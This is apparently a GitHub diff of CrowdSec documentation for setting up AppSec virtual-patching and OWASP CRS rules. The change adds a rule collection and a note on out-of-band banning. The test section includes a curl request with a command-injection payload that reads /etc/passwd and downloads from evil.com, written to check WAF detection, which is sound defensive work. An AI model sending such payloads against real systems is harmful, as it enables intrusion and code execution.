File tree Expand file tree Collapse file tree 1 file changed +3
-1
lines changed
crowdsec-docs/docs/appsec Expand file tree Collapse file tree 1 file changed +3
-1
lines changed Original file line number Diff line number Diff line change @@ -20,7 +20,7 @@ Install both the virtual patching and CRS collections:
2020
2121``` bash
2222# Install virtual patching rules (in-band blocking)
23- cscli collections install crowdsecurity/appsec-virtual-patching
23+ cscli collections install crowdsecurity/appsec-virtual-patching crowdsecurity/appsec-generic-rules
2424
2525# Install OWASP CRS rules (out-of-band detection + scenario)
2626cscli collections install crowdsecurity/appsec-crs
@@ -119,6 +119,8 @@ curl -I ${TARGET}'/.env'
119119
120120## Testing - OWASP CRS
121121
122+ When OWASP CRS are loaded in out-of-band, those requests will return 200, but the IP will ultimately get banned.
123+
122124``` bash
123125TARGET=localhost
124126curl -I ${TARGET} ' /?x=A";cat+/etc/passwd;wget+http://evil.com/payload'
You can’t perform that action at this time.
0 commit comments